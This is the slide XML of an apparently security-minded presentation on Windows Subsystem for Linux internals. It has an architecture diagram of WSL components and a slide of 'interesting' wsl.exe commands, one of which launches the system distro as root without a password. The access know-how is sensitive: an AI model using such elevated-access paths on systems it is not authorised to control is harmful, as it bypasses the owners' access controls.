          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4846350" y="2855050"/>
            <a:ext cx="3867900" cy="19464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101" name="Google Shape;101;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4846350" y="2399063"/>
            <a:ext cx="191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l" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>LINUX DISTRO</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Google Shape;102;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6164050" y="1720825"/>
            <a:ext cx="144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l" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>mini_init</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="Google Shape;103;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7047000" y="3292775"/>
            <a:ext cx="144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l" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>init</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Google Shape;104;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6884950" y="4227725"/>
            <a:ext cx="144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l" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>plan9</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Google Shape;105;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2800350" y="2433538"/>
            <a:ext cx="144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l" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>wsl.exe</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="Google Shape;106;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="524100" y="2647188"/>
            <a:ext cx="17901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l" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>wslhost.exe</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Google Shape;107;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1374350" y="1493213"/>
            <a:ext cx="20544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l" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>wslservice.exe</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Google Shape;108;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1835750" y="3361688"/>
            <a:ext cx="144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l" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>wslapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>.dll</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Google Shape;109;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="560250" y="4276650"/>
            <a:ext cx="37818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pl" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>Windows filesystem</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="110" name="Google Shape;110;p19"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="107" idx="3"/>
            <a:endCxn id="102" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3428750" y="1708763"/>
            <a:ext cx="2735400" cy="227700"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd fmla="val 49998" name="adj1"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:schemeClr val="lt1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="111" name="Google Shape;111;p19"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="102" idx="2"/>
            <a:endCxn id="103" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="-5400000">
            <a:off x="6755950" y="2280925"/>
            <a:ext cx="1140900" cy="882900"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd fmla="val 49998" name="adj1"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:schemeClr val="lt1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="112" name="Google Shape;112;p19"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="103" idx="2"/>
            <a:endCxn id="104" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="7434900" y="3894875"/>
            <a:ext cx="504000" cy="162000"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd fmla="val 49985" name="adj1"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:schemeClr val="lt1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="113" name="Google Shape;113;p19"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="104" idx="1"/>
            <a:endCxn id="109" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4342150" y="4443275"/>
            <a:ext cx="2542800" cy="48900"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd fmla="val 50002" name="adj1"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:schemeClr val="lt1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="114" name="Google Shape;114;p19"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="106" idx="0"/>
            <a:endCxn id="107" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="5400000">
            <a:off x="927600" y="2155638"/>
            <a:ext cx="938400" cy="44700"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd fmla="val 38516" name="adj1"/>
              <a:gd fmla="val 632942" name="adj2"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:schemeClr val="lt1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="triangle"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="115" name="Google Shape;115;p19"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="105" idx="0"/>
            <a:endCxn id="107" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="5400000">
            <a:off x="2706900" y="1619188"/>
            <a:ext cx="509100" cy="1119600"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd fmla="val 50012" name="adj1"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:schemeClr val="lt1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="Google Shape;116;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5007025" y="2974325"/>
            <a:ext cx="1031400" cy="43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l" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>relay</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="117" name="Google Shape;117;p19"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="105" idx="2"/>
            <a:endCxn id="116" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="-5400000">
            <a:off x="4101600" y="2284288"/>
            <a:ext cx="325200" cy="1485900"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:schemeClr val="lt1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="118" name="Google Shape;118;p19"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="108" idx="0"/>
            <a:endCxn id="107" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="5400000">
            <a:off x="1760450" y="2565488"/>
            <a:ext cx="1437300" cy="155100"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd fmla="val 50003" name="adj1"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:schemeClr val="lt1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="Google Shape;119;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2168600" y="1968700"/>
            <a:ext cx="465900" cy="184800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="pl" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>COM</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="Google Shape;120;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="524300" y="2216463"/>
            <a:ext cx="1505400" cy="138600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="pl" sz="900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>CreateProcessAsUser</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="900">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="Google Shape;121;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5373888" y="4394400"/>
            <a:ext cx="858000" cy="184800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="pl" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>hvsock</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="Google Shape;122;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5769875" y="3684350"/>
            <a:ext cx="1031400" cy="384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pl" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>command</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="123" name="Google Shape;123;p19"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="116" idx="2"/>
            <a:endCxn id="122" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="-5400000">
            <a:off x="5410675" y="3517475"/>
            <a:ext cx="471300" cy="247200"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:schemeClr val="lt1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="Google Shape;124;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3835188" y="3014163"/>
            <a:ext cx="858000" cy="184800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="pl" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>hvsock</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains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1468" l="2812" r="2821" t="4414"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144003" cy="5143501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="Google Shape;130;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="115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WSLg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l"/>
              <a:t>Interesting wsl.exe commands</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="136" name="Google Shape;136;p21"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="952500" y="1245450"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{EA303852-4C76-49B2-B6D6-87ABED8BA39D}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3619500"/>
                <a:gridCol w="3619500"/>
              </a:tblGrid>
              <a:tr h="381000">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wsl </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pl" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="JetBrains Mono"/>
                          <a:ea typeface="JetBrains Mono"/>
                          <a:cs typeface="JetBrains Mono"/>
                          <a:sym typeface="JetBrains Mono"/>
                        </a:rPr>
                        <a:t>--debug-shell</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WSL debug shell within VM (requires admin privs)</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r h="381000">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wsl --system -u root</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Launch</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pl" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="JetBrains Mono"/>
                          <a:ea typeface="JetBrains Mono"/>
                          <a:cs typeface="JetBrains Mono"/>
                          <a:sym typeface="JetBrains Mono"/>
                        </a:rPr>
                        <a:t> system distro as root w/o password</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r h="381000">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wsl -e "whoami"</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c>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pl" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
